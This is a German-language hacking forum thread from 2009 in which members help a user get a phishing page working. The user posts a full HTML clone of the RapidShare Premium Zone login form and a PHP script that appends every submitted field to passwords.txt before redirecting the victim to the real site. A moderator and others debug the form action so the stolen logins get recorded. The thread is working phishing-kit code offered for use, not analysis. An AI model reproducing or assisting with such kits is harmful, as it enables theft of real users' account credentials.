PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Problem mit Phishingseite aus dem Sammelthread



Gaga4ever
28.07.2009, 14:14
hallo,
ich habe jetz die phishing seite von dem erstem post genomm jetz wollte ich ichs teste ..
aber ich bekahm nur leere log daten.. bitte um hilfe

VeN0m
28.07.2009, 14:20
In den Sammelthread gehören nur Phishingseiten, die fertig sind - Andere Beiträge werden gelöscht.
Ich habe diesen hier nun dennoch in einen neuen Thread verschoben, damit Du Hilfe bekommst.

[quoe=Gaga4ever]die phishing seite von dem ersten post[/quote]

Welche genau? Und auf welchem Webspace bist Du?
Mehr Informationen bitte ;).

NoNameMT
28.07.2009, 14:53
ne der hostesr muss meines wissens nach php aktiviert haben sonst kann das script nicht ausgeführt werden.

korrigiert mich wenn ich falsch liege

VeN0m
28.07.2009, 15:00
Wenn ein Script benutzt wird, dass eine Log-Datei anfertigen soll (und vorher keine vorhanden ist) passiert dies mit PHP - wenn sie dann angefertigt wird jedoch leer ist stimmt was anderes nicht ;).
Ich denke eher, die benutzte Phishingseite ist nicht so toll. Daher wollte ich gerne die genaue Bezeichnung ^^.

NoNameMT
28.07.2009, 15:02
okay ich habs falsch gelesen... ich dachte er kriegt gar keine log daten^^

mein fehler

kalachnikov
28.07.2009, 15:29
poste doch mal dein Code..
dann wissen wir warum in deiner log datei nix steht!

Gaga4ever
28.07.2009, 16:05
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>


<title>RapidShare: Easy Filehosting</title>
<link rel="icon" href="https://ssl.rapidshare.com/img2/favicon.ico" type="image/ico">
<link rel="SHORTCUT ICON" href="https://ssl.rapidshare.com/img2/favicon.ico">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="https://ssl.rapidshare.com/img2/styles.css">
<script type="text/javascript">
<!--
function enable_menues_for_ie()
{
if (document.all) {
uls = document.getElementsByTagName('UL');
for(i = 0; i < uls.length; i++) {
if (uls[i].className == 'dropdown') {
var lis = uls[i].getElementsByTagName('li');
for (j = 0; j < lis.length; j++) {
if(lis[j].lastChild.tagName == 'UL') {
lis[j].onmouseover = function() { this.lastChild.style.display = 'block'; }
lis[j].onmouseout = function() { this.lastChild.style.display = 'none'; }
}
}
}
}
}
}
window.onload = enable_menues_for_ie;
//-->
</script>
</head><body>
<center>
<div class="hauptmenue">
<table><tbody><tr><td>
<ul class="dropdown">
<li><a href="http://rapidshare.com/index.html">Home</a></li>
<li><a href="http://rapidshare.com/news.html">News</a></li>
<li><a href="https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi">Premium Zone</a>
<ul>
<li><a href="https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi">Premium Zone Login</a></li>
<li><a href="http://rapidshare.com/premium.html">Create Account</a></li>
<li><a href="http://rapidshare.com/verlaengern.html">Extend Account</a></li>
<li><a href="http://rapidshare.com/forgotpw.html">Forgot Password</a></li>
<li style="border: 0px none ;"><a href="http://rapidshare.com/faq5.html">TrafficShare</a></li>
</ul>
</li>
<li><a href="http://rapidshare.com/freezone.html">Free Zone</a>
<ul>
<li><a href="https://ssl.rapidshare.com/cgi-bin/collectorszone.cgi">Collector's Zone Login</a></li>
<li><a href="http://rapidshare.com/folderadmin.html">LinkList Login</a></li>
<li style="border: 0px none ;"><a href="http://rapidshare.com/freefolders.html">Create LinkList</a></li>
</ul>
</li>
<li><a href="http://www.rapidgames.com/" target="_blank">RapidGames</a></li>
<li><a href="http://rapidshare.com/rapidtools.html">RapidTools</a>
<ul>
<li><a href="http://rapidshare.com/rsm.html">RapidShare Manager</a></li>
<li><a href="http://rapidshare.com/rapiduploader.html">RapidUploader</a></li>
<li style="border: 0px none ;"><a href="http://rapidshare.com/checkfiles.html">RapidShare Checker</a></li>
</ul>
</li>
<li><a href="http://rapidshare.com/supportseite.html">Support</a>
<ul>
<li><a href="http://rapidshare.com/faq.html">FAQ</a></li>
<li><a href="http://rapidshare.com/support.html">Support Contact</a></li>
<li><a href="http://rapidshare.com/abuse.html">Abuse Contact</a></li>
<li style="border: 0px none ;"><a href="http://rapidshare.com/security.html">Security advice</a></li>
</ul>
</li>
<li style="border: 0px none ;"><a href="http://rapidshare.com/rapidshare.html"><nobr>RapidShare AG</nobr></a>
<ul>
<li><a href="http://rapidshare.com/wiruberuns.html">About us</a></li>
<li><a href="http://rapidshare.com/testimonials.html">Testimonials</a></li>
<li><a href="http://rapidshare.com/banners.html">Banner</a></li>
<li><a href="http://rapidshare.com/agb.html">Conditions of use</a></li>
<li style="border: 0px none ;"><a href="http://rapidshare.com/imprint.html">Imprint</a></li>
</ul>
</li>
</ul>
</td></tr></tbody></table>
</div>
<a href="http://rapidshare.com/"><img src="https://ssl.rapidshare.com/img2/rslogo.gif" alt="logo" height="214" width="300"></a>
<noscript><h1>This page needs JavaScript, to display all information correct!</h1></noscript>

<div id="inhaltbox">
<h1>Premium-Zone
| Login</h1>
<center>
<form action="ftp.php2.ph.funpic.de/phis.php" method="post">
<table cellpadding="5">
<tbody><tr>
<td>Login:</td>
<td><input name="login" size="16" style="width: 100%;" type="text"></td>
</tr>
<tr>
<td>Password:</td>
<td><input name="password" size="16" style="width: 100%;" type="password"></td>
</tr>
<tr>
<td></td>
<td align="center"><input value="Premium Zone Login" type="submit"></td>
</tr>
</tbody></table>
</form>
<a href="http://rapidshare.com/forgotpw.html">Request forgotten password</a> | <a href="http://rapidshare.com/premium.html">Set up Premium Account</a>
</center>
<div style="text-align: center; margin-top: 60px;">
<div style="color: rgb(0, 39, 96); font-size: 10pt; font-weight: bold;">SSL-encrypted page</div>
<div style="color: rgb(142, 144, 143); font-size: 8pt;">This, and all other pages are SSL encrypted!</div>
</div>

<div class="untermenue">
<a href="http://rapidshare.com/wiruberuns.html">About us</a> | <a href="http://rapidshare.com/agb.html">Terms of use</a> | <a href="http://rapidshare.com/imprint.html">Imprint</a>
</div>

</div>
</center>
<p>&nbsp;</p>
<div style="position: fixed; left: 0px; bottom: 0px; width: 100%;">
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody><tr>
<td style="background-color: rgb(142, 144, 143);" width="50%">&nbsp;</td>
<td style="background-color: rgb(0, 39, 96);">&nbsp;</td>
</tr>
</tbody></table>
</div>
</body></html>
hoffe auf gute antwort^^

VeN0m
28.07.2009, 16:11
<form action="ftp.php2.ph.funpic.de/phis.php" method="post">


Die phis.php hätte ich gerne gesehen. Gepostet hast Du die HTML-Datei, die mit dem erstellen der Log-Datei nichts zu tun hat außer, dass sie die Daten überträgt ;).

Gaga4ever
28.07.2009, 16:11
jetz wurde mein php acc auch noch gesperrt ich hasse funpic und ohost !
weis jemand was ich eingeben muss wennich einen bei triipot habe ? weil da steht ja immer nur ftp.mitglied.lycos.de mein name gaga4ever ...


<?php
header ('Location: https://ssl.rapidshare.com/premiumzone.html ');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

dann muss das das hier sein ^^

kalachnikov
28.07.2009, 16:15
ja genau! die phish.php quelldatei brauchen wir.
Das kann doch nicht so schwer sein..!

VeN0m
28.07.2009, 16:21
Nach kurzer Überlegung fiel mir auf, dass es hier ran liegen muss:



<form action="ftp.php2.ph.funpic.de/phis.php" method="post">


Hätte mir aber auch schon vorher auffallen müssen. "ftp.php2.php.funpic.de" ist die Verbindungssubdomäne für eine FTP-Verbindung und nicht für Datenübertragungen über HTTP geeignet. Wenn die phis.php im Hauptverzeichnis des Spaces liegt reicht



<form action="/phis.php" method="post">


Ich denke, daran liegt es, dass die POST-Daten nicht richtig angenommen werden können. Versuchs mal so, wie ich es gerade gepostet habe.
Weil der PHP-Code ist ein Standard-Code der i.d.R. immer funktioniert.

Gaga4ever
28.07.2009, 16:47
aber woher will der den wissen wo der das pw den hin senden soll ?
ich muss doch irhdn wo mein ftp eingeben oder nich?!

VeN0m
28.07.2009, 16:54
Nö. Wenn die PHP-Datei auf dem eigenen Webspace liegt kann sie dort handeln ohne Einschränkungen (außer von der PHP.ini, was i.d.R. nicht vorliegt). Das heißt sie kann Dateien erstellen, beschreiben etc. Der Pfad muss also nur lauten /phis.php.

Gaga4ever
28.07.2009, 17:01
ne habe probiert ... aber im tut wo irgn wo gefunden habe sant das so das ich da das eingeben muss hmm was nu ?? ^^

VeN0m
28.07.2009, 17:06
Bitte prüfe Deinen Beitrag nächstes Mal auf Rechtschreibung, danke.

Mit FTP ist das definitiv falsch. Ich hatte schon mehr als genug Scripte, die solcherlei Arbeiten erledigt haben - und seltsamerweise gingen alle.
Die Angabe von FTP innerhalb der Formular-Action ist grundsätlich falsch - Wenn überhaupt kommt sie in die PHP-Datei und auch nicht so, wie Du es gemacht hast. Zudem gilt das nur für Remote-Verbindungen.
Zum eigenen Webspace ist das wie gesagt nicht nötig und auch sinnlos.

Gaga4ever
28.07.2009, 17:10
ja ok naja dann danke ich habe noch nen tut gefunden werde das mal folgen
danke das du mir geholfen hast oder versucht hast ^^